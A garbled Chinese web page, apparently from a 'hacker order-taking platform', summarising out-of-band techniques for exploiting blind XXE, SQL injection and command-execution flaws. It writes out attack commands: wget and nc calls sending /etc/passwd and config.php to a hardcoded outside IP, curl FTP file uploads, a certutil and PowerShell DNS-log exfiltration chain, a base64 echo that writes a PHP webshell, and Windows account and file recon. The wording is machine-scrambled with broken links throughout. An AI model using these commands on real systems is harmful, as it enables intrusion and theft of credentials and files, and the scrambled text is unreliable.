带外通道技术(OOB)总结-黑客接单平台

访客6年前关于黑客接单1064
在浸透中,常常碰到封闭回显的缝隙,常见的XXE盲注,SQL盲注,反序列号无回显,这个时分常用到OOB带外数据通道,带外通道技能(OOB)让进犯者可以经过另一种 *** 来承认和运用所谓的盲目(blind)的缝隙。在这种盲目的缝隙中,进犯者无法经过歹意恳求直接在呼应包中看到缝隙的输出成果。带外通道技能一般需求软弱的实体来生成带外的TCP/UDP/ICMP恳求,然后,进犯者可以经过这个恳求来提取数据。一次OOB进犯可以成功躲避监控,绕过防火墙且能更好的躲藏自己。 本文的中心是在各种无回显的缝隙环境中运用带外通道技能将其传输的一个总结。 一、可回显 OWASP TOP 10 注入 关于可回显的注入运用依据联合查询、报错、盲注直接运用! xxe 可回显的xxe直接引证DTD外部实体声明,常见运用 *** :读取恣意文件、履行体系指令、勘探内网端口和进犯内网网站 指令履行&代码履行 代码履行 常见相关函数:PHP:eval、preg_replace + /e形式、assertJavascript:evalVbscript: Execute、EvalPython:exec 直接写入webshell可直接被中间件解析的脚本 指令履行 A. windows 1. 信息搜集net view #获取当时组的核算机名net view /domain #检查一切域net user #若如struts等给的权限高用administrator,直接可增加帐号,管理员组,躲藏克隆帐号等操作,如struts2缝隙大多数为adminisrator权限参考文献:横向浸透 2. 读取文件dir /s/a-d/b d:*.php #查找一切php文件方位 3. 文件写入& echo ^^' > "D:phpStudyPHPTutorialWWWshell.php"等特别符号在cmd下需求转码 并且写入文件不行带有:等特别字符 4. msf等后门 B. linux 1. 常见函数:system、exec、assert、shell_exec、passthru、popen、proc_popen、escapeshellcmd、pcntl_exec 2. 特别符号:|、&、&&、||、;、',",(),{},[],输入输出/重定向,通配符 3. 敏感数据获取echo PD9waHAgcGhwaW5mbygpOz8+ | base64 -d >shell.php #PD9waHAgcGhwaW5mbygpOz+是base64编码 linux文件名不能带有/(斜杠) 4. DNS等持续性后门 二、无回显OOB(out of band) 倘若在发现这些缝隙的时分,无回显,这时OOB就上台了,常见的 *** 是HTTP、ICMP、DNS,ICMP地道一般会进行防护,TCP在甲方中会有严厉的防火墙操控端口,HTTP在甲方中一般也会有严厉且完好的监控和阻断机制,DNS地道在当时环境下,因为需求解析,不会对其进行阻拦 HTTP 运用条件:无法回显但能出网时运用 Window内置 explorer 查询文件方位web历史记载 会翻开方针浏览器,不主张运用,且内容过多,循环导致浏览器卡死 telnet 模仿HTTP恳求需强壮的交互性 CurlCurl 默许不自带,需解压增加环境变量或装置curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}-T经过put *** 上传与层地址 Wgetwget指定header头检查日志回显 wget -d --header="User-Agent: $(cat /etc/passwd|tail -n 1)" [[[[[http://120.79.206.249/1.php] wget --header="User-Agent: $(cat /etc/passwd | xargs echo –n)" 发送post恳求,并承受post数据wget --post-data exfil=’cat /etc/passwd’ [[[[[http://120.79.206.249](http://120.79.206.249)] powershell这儿用的是dnslog原理ipconfig > temp && certutil -f -encodehex temp output.hex 12 && set /p MYVAR=http://dnslog:9000/!MYVAR!](http://dnslog:9000/!MYVAR!)]&& powershell Invoke-WebRequest !FINAL!" nc体系或许无nc,且nc被监控的或许性较大nc -w 1000 120.79.206.249 config.php dnslog 依据原理只需求建立一个上图中scholar域DNS 服务器,并即将盲打或盲注的回显,放到自己域名的二级乃至三级域名上去恳求,就可以经过DNS解析日志来获取到它们。其本质便是运用FQDN想域服务器解析为iP地址被记载的进程 DNSlog建立 在线渠道ceye.io 在线渠道TOOLS SQL盲注 不论是bool型盲注仍是时刻型盲注,都需求频频的跑恳求才可以获取数据库中的值,在WAF的防护下,很或许导致IP被ban。咱们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时,可以运用内置函数load_file()来完结DNSLOG。load_file()不只可以加载本地文件,一起也能对比如www.test.com](http://www.test.com)这样的URL建议恳求。这样的URL建议恳求。](http://www.test.com)这样的URL建议恳求。这样的URL建议恳求。)))[1][2][3]黑客接单网

相关文章

Web爬虫:多线程、异步与动态署理开始

在收集数据的时分,经常会碰到有反收集战略规矩的WAF,使得原本很简略工作变得复杂起来。黑名单、约束拜访频率、检测HTTP头号这些都是常见的战略,不按常理出牌的也有检测到爬虫行为,就往里注入假数据回来,...

SP eric靶机通关攻略-黑客接单平台

咱们好,今日给咱们带来的靶机是SP eric,这个靶机有两个flag,咱们的方针便是把它们都找出来,flag的方位现已供给,如下: · /root/flag.txt · /root/eric/flag...

一个MongoDB注入进犯事例剖析

在开端咱们的MongoDB“注入之旅”之前,咱们需求先知道和其他数据库比较,为什么咱们更乐意选MongoDB——由于MongoDB并不是SQL作为查询句子,所以人们可能会认为这样的数据库难以进行注入进...

在Go中运用反向署理进行网络垂钓测验

关于一个进犯者来说,要想施行一次网络垂钓进犯,往往需求做很多的准备作业。例如建立垂钓站点,诱惑受害者上钩,捕获受害者的登录凭据等。为了防止这些冗杂的进程,本文我将教咱们运用Go自动化这些进程。 完好的...

看我怎么发现GitHub提权缝隙取得$10000赏金

之前,我从没参加过GitHub官方的一些缝隙众测项目,在HackerOne建议的HackTheWorld竞赛中,主办方宣扬除了赏金以外,还有时机取得Github供给的终身无约束私有库(unlimit...

网站被挂木马与777权限的微妙

 某天VIP大讲堂微信群里的一位同学说网站被人挂马了,查了半响也查不到原因。艺龙SEO负责人刘明问了一句“是不是技能把linux体系里网站的中心目录设置777文件权限了”,同学查后发现不出所料。那么,...